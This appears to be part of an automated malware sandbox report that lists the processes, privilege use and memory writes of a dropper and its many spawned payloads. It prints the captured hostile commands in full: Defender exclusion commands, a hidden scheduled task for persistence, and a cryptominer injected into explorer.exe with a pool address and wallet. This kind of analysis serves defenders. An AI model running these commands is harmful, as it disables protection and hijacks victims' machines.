HTTP User-Agent header	8	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 41 IoCs

Processes:

conhost.exepowershell.execonhost.exepowershell.exepowershell.exepowershell.exeMyNotes.exeMyNotes.exeMyNotes.exeMyNotes.exeMyNotes.exeMyNotes.execonhost.exepowershell.execonhost.exepowershell.exeMyNotes.exeMyNotes.exe

pid	process
3384	conhost.exe
5092	powershell.exe
5092	powershell.exe
1400	conhost.exe
1400	conhost.exe
1896	powershell.exe
1896	powershell.exe
1896	powershell.exe
5036	powershell.exe
5036	powershell.exe
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe
4372	MyNotes.exe
4372	MyNotes.exe
4428	MyNotes.exe
4428	MyNotes.exe
3720	MyNotes.exe
3720	MyNotes.exe
3944	MyNotes.exe
3944	MyNotes.exe
3392	MyNotes.exe
3392	MyNotes.exe
4348	MyNotes.exe
4348	MyNotes.exe
3348	conhost.exe
3348	conhost.exe
3348	conhost.exe
4104	powershell.exe
4104	powershell.exe
4104	powershell.exe
5088	conhost.exe
5088	conhost.exe
5088	conhost.exe
224	powershell.exe
224	powershell.exe
224	powershell.exe
3288	MyNotes.exe
3288	MyNotes.exe
176	MyNotes.exe
176	MyNotes.exe

Suspicious use of AdjustPrivilegeToken 57 IoCs

Processes:

askinstall25.exeanytime4.exemyfile.exelogger.exeanytime1.exeanytime2.exeanytime3.exeRobCleanerInstll33132.exeProxyupd.exetaskkill.execonhost.exepowershell.execonhost.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.execonhost.exepowershell.exeexplorer.exeexplorer.exe

description	pid	process
Token: SeCreateTokenPrivilege	4100	askinstall25.exe
Token: SeAssignPrimaryTokenPrivilege	4100	askinstall25.exe
Token: SeLockMemoryPrivilege	4100	askinstall25.exe
Token: SeIncreaseQuotaPrivilege	4100	askinstall25.exe
Token: SeMachineAccountPrivilege	4100	askinstall25.exe
Token: SeTcbPrivilege	4100	askinstall25.exe
Token: SeSecurityPrivilege	4100	askinstall25.exe
Token: SeTakeOwnershipPrivilege	4100	askinstall25.exe
Token: SeLoadDriverPrivilege	4100	askinstall25.exe
Token: SeSystemProfilePrivilege	4100	askinstall25.exe
Token: SeSystemtimePrivilege	4100	askinstall25.exe
Token: SeProfSingleProcessPrivilege	4100	askinstall25.exe
Token: SeIncBasePriorityPrivilege	4100	askinstall25.exe
Token: SeCreatePagefilePrivilege	4100	askinstall25.exe
Token: SeCreatePermanentPrivilege	4100	askinstall25.exe
Token: SeBackupPrivilege	4100	askinstall25.exe
Token: SeRestorePrivilege	4100	askinstall25.exe
Token: SeShutdownPrivilege	4100	askinstall25.exe
Token: SeDebugPrivilege	4100	askinstall25.exe
Token: SeAuditPrivilege	4100	askinstall25.exe
Token: SeSystemEnvironmentPrivilege	4100	askinstall25.exe
Token: SeChangeNotifyPrivilege	4100	askinstall25.exe
Token: SeRemoteShutdownPrivilege	4100	askinstall25.exe
Token: SeUndockPrivilege	4100	askinstall25.exe
Token: SeSyncAgentPrivilege	4100	askinstall25.exe
Token: SeEnableDelegationPrivilege	4100	askinstall25.exe
Token: SeManageVolumePrivilege	4100	askinstall25.exe
Token: SeImpersonatePrivilege	4100	askinstall25.exe
Token: SeCreateGlobalPrivilege	4100	askinstall25.exe
Token: 31	4100	askinstall25.exe
Token: 32	4100	askinstall25.exe
Token: 33	4100	askinstall25.exe
Token: 34	4100	askinstall25.exe
Token: 35	4100	askinstall25.exe
Token: SeDebugPrivilege	4664	anytime4.exe
Token: SeDebugPrivilege	1228	myfile.exe
Token: SeDebugPrivilege	3508	logger.exe
Token: SeDebugPrivilege	432	anytime1.exe
Token: SeDebugPrivilege	3000	anytime2.exe
Token: SeDebugPrivilege	3712	anytime3.exe
Token: SeDebugPrivilege	1428	RobCleanerInstll33132.exe
Token: SeDebugPrivilege	3112	Proxyupd.exe
Token: SeDebugPrivilege	2080	taskkill.exe
Token: SeDebugPrivilege	3384	conhost.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	1400	conhost.exe
Token: SeDebugPrivilege	1896	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	3348	conhost.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	5088	conhost.exe
Token: SeDebugPrivilege	224	powershell.exe
Token: SeLockMemoryPrivilege	4272	explorer.exe
Token: SeLockMemoryPrivilege	4056	explorer.exe
Token: SeLockMemoryPrivilege	4272	explorer.exe
Token: SeLockMemoryPrivilege	4056	explorer.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

MyNotes.exe

pid process

3944 MyNotes.exe
3944 MyNotes.exe

pid	process
3944	MyNotes.exe
3944	MyNotes.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exelijia.exeanytime4.exeaskinstall25.exeanytime1.execmd.exeLzmwAqmV.exeMyNotes Installation.execonhost.execmd.execmd.exeLzmwAqmV.exe

description	pid	process	target process
PID 4080 wrote to memory of 1428	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	RobCleanerInstll33132.exe
PID 4080 wrote to memory of 1428	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	RobCleanerInstll33132.exe
PID 4080 wrote to memory of 1428	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	RobCleanerInstll33132.exe
PID 4080 wrote to memory of 3788	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	lijia.exe
PID 4080 wrote to memory of 3788	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	lijia.exe
PID 4080 wrote to memory of 3788	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	lijia.exe
PID 3788 wrote to memory of 3472	3788	lijia.exe	lijia.exe
PID 3788 wrote to memory of 3472	3788	lijia.exe	lijia.exe
PID 3788 wrote to memory of 3472	3788	lijia.exe	lijia.exe
PID 4080 wrote to memory of 3112	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	Proxyupd.exe
PID 4080 wrote to memory of 3112	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	Proxyupd.exe
PID 4080 wrote to memory of 3112	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	Proxyupd.exe
PID 4080 wrote to memory of 3528	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	Fixfile01.exe
PID 4080 wrote to memory of 3528	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	Fixfile01.exe
PID 4080 wrote to memory of 3528	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	Fixfile01.exe
PID 4080 wrote to memory of 4056	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	inst.exe
PID 4080 wrote to memory of 4056	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	inst.exe
PID 4080 wrote to memory of 4056	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	inst.exe
PID 4080 wrote to memory of 4132	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	setup.exe
PID 4080 wrote to memory of 4132	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	setup.exe
PID 4080 wrote to memory of 4132	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	setup.exe
PID 4080 wrote to memory of 4100	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	askinstall25.exe
PID 4080 wrote to memory of 4100	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	askinstall25.exe
PID 4080 wrote to memory of 4100	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	askinstall25.exe
PID 4080 wrote to memory of 4844	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	MyNotes Installation.exe
PID 4080 wrote to memory of 4844	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	MyNotes Installation.exe
PID 4080 wrote to memory of 4844	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	MyNotes Installation.exe
PID 4080 wrote to memory of 1228	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	myfile.exe
PID 4080 wrote to memory of 1228	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	myfile.exe
PID 4080 wrote to memory of 432	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	anytime1.exe
PID 4080 wrote to memory of 432	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	anytime1.exe
PID 4080 wrote to memory of 3000	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	anytime2.exe
PID 4080 wrote to memory of 3000	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	anytime2.exe
PID 4080 wrote to memory of 3712	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	anytime3.exe
PID 4080 wrote to memory of 3712	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	anytime3.exe
PID 4080 wrote to memory of 4664	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	anytime4.exe
PID 4080 wrote to memory of 4664	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	anytime4.exe
PID 4080 wrote to memory of 3508	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	logger.exe
PID 4080 wrote to memory of 3508	4080	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe	logger.exe
PID 4664 wrote to memory of 4136	4664	anytime4.exe	LzmwAqmV.exe
PID 4664 wrote to memory of 4136	4664	anytime4.exe	LzmwAqmV.exe
PID 4100 wrote to memory of 1592	4100	askinstall25.exe	cmd.exe
PID 4100 wrote to memory of 1592	4100	askinstall25.exe	cmd.exe
PID 4100 wrote to memory of 1592	4100	askinstall25.exe	cmd.exe
PID 432 wrote to memory of 1320	432	anytime1.exe	LzmwAqmV.exe
PID 432 wrote to memory of 1320	432	anytime1.exe	LzmwAqmV.exe
PID 1592 wrote to memory of 2080	1592	cmd.exe	taskkill.exe
PID 1592 wrote to memory of 2080	1592	cmd.exe	taskkill.exe
PID 1592 wrote to memory of 2080	1592	cmd.exe	taskkill.exe
PID 4136 wrote to memory of 3384	4136	LzmwAqmV.exe	conhost.exe
PID 4136 wrote to memory of 3384	4136	LzmwAqmV.exe	conhost.exe
PID 4136 wrote to memory of 3384	4136	LzmwAqmV.exe	conhost.exe
PID 4844 wrote to memory of 4888	4844	MyNotes Installation.exe	MyNotes License Agreement.exe
PID 4844 wrote to memory of 4888	4844	MyNotes Installation.exe	MyNotes License Agreement.exe
PID 4844 wrote to memory of 4888	4844	MyNotes Installation.exe	MyNotes License Agreement.exe
PID 3384 wrote to memory of 3604	3384	conhost.exe	cmd.exe
PID 3384 wrote to memory of 3604	3384	conhost.exe	cmd.exe
PID 3604 wrote to memory of 5092	3604	cmd.exe	powershell.exe
PID 3604 wrote to memory of 5092	3604	cmd.exe	powershell.exe
PID 3384 wrote to memory of 2420	3384	conhost.exe	cmd.exe
PID 3384 wrote to memory of 2420	3384	conhost.exe	cmd.exe
PID 2420 wrote to memory of 1800	2420	cmd.exe	schtasks.exe
PID 2420 wrote to memory of 1800	2420	cmd.exe	schtasks.exe
PID 1320 wrote to memory of 1400	1320	LzmwAqmV.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe
"C:\Users\Admin\AppData\Local\Temp\20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4080

C:\Users\Admin\AppData\Local\Temp\RobCleanerInstll33132.exe
"C:\Users\Admin\AppData\Local\Temp\RobCleanerInstll33132.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1428

C:\Users\Admin\AppData\Local\Temp\lijia.exe
"C:\Users\Admin\AppData\Local\Temp\lijia.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3788

C:\Users\Admin\AppData\Local\Temp\lijia.exe
"C:\Users\Admin\AppData\Local\Temp\lijia.exe" -u
3⤵
- Executes dropped EXE
PID:3472

C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe
"C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3112

C:\Users\Admin\AppData\Local\Temp\Fixfile01.exe
"C:\Users\Admin\AppData\Local\Temp\Fixfile01.exe"
2⤵
- Executes dropped EXE
PID:3528

C:\Users\Admin\AppData\Local\Temp\inst.exe
"C:\Users\Admin\AppData\Local\Temp\inst.exe"
2⤵
- Executes dropped EXE
PID:4056

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
2⤵
- Executes dropped EXE
PID:4132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 792
3⤵
- Program crash
PID:4588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 800
3⤵
- Program crash
PID:3752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 924
3⤵
- Program crash
PID:4124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 932
3⤵
- Program crash
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 964
3⤵
- Program crash
PID:4524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1148
3⤵
- Program crash
PID:4288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1212
3⤵
- Program crash
PID:3720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1364
3⤵
- Program crash
PID:5072

C:\Users\Admin\AppData\Local\Temp\askinstall25.exe
"C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4100

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1592

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2080

C:\Users\Admin\AppData\Local\Temp\MyNotes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\MyNotes Installation.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4844

C:\Users\Admin\AppData\Local\Temp\SKfJPz8D7ef4g\MyNotes License Agreement.exe
"C:\Users\Admin\AppData\Local\Temp\SKfJPz8D7ef4g\MyNotes License Agreement.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:4888

C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe
"C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe" "--Vk93vNV"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3944

C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe
C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\MyNotes\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\MyNotes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\MyNotes\User Data" --annotation=plat=Win64 --annotation=prod=MyNotes --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff85e47dec0,0x7ff85e47ded0,0x7ff85e47dee0
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2524

C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe
"C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe" --type=gpu-process --field-trial-handle=1672,7144494735680092843,2745832137264912728,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\MyNotes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3944_730371012" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1700 /prefetch:2
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4372

C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe
"C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1672,7144494735680092843,2745832137264912728,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\MyNotes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3944_730371012" --mojo-platform-channel-handle=1796 /prefetch:8
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:4428

C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe
"C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1672,7144494735680092843,2745832137264912728,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\MyNotes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3944_730371012" --mojo-platform-channel-handle=2176 /prefetch:8
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3720

C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe
"C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\MyNotes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1672,7144494735680092843,2745832137264912728,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\MyNotes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3944_730371012" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2604 /prefetch:1
5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3392

C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe
"C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\MyNotes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1672,7144494735680092843,2745832137264912728,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\MyNotes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3944_730371012" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2716 /prefetch:1
5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4348

C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe
"C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,7144494735680092843,2745832137264912728,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\MyNotes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3944_730371012" --mojo-platform-channel-handle=3744 /prefetch:8
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3288

C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe
"C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe" --type=gpu-process --field-trial-handle=1672,7144494735680092843,2745832137264912728,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\MyNotes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3944_730371012" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3776 /prefetch:2
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:176

C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe
"C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,7144494735680092843,2745832137264912728,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\MyNotes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3944_730371012" --mojo-platform-channel-handle=844 /prefetch:8
5⤵
PID:2528

C:\Users\Admin\AppData\Local\Temp\myfile.exe
"C:\Users\Admin\AppData\Local\Temp\myfile.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:1228

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1228 -s 1932
3⤵
- Program crash
PID:4308

C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1320

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
5⤵
PID:1076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4228

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
5⤵
PID:2812

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
6⤵
- Creates scheduled task(s)
PID:4044

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
5⤵
PID:1648

C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
6⤵
- Executes dropped EXE
PID:2440

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
7⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
8⤵
PID:2812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
9⤵
PID:2808

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.sprite/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6D5Kw+SNPLfPB2ukC//O063ow4gpmyCIpKu2yHpDxuv7" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4056

C:\Users\Admin\AppData\Local\Temp\anytime2.exe
"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3000 -s 1692
3⤵
- Program crash
PID:3792

C:\Users\Admin\AppData\Local\Temp\anytime3.exe
"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3712

C:\Users\Admin\AppData\Local\Temp\anytime4.exe
"C:\Users\Admin\AppData\Local\Temp\anytime4.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4664

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4136

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3384

C:\Windows\System32\cmd.exe
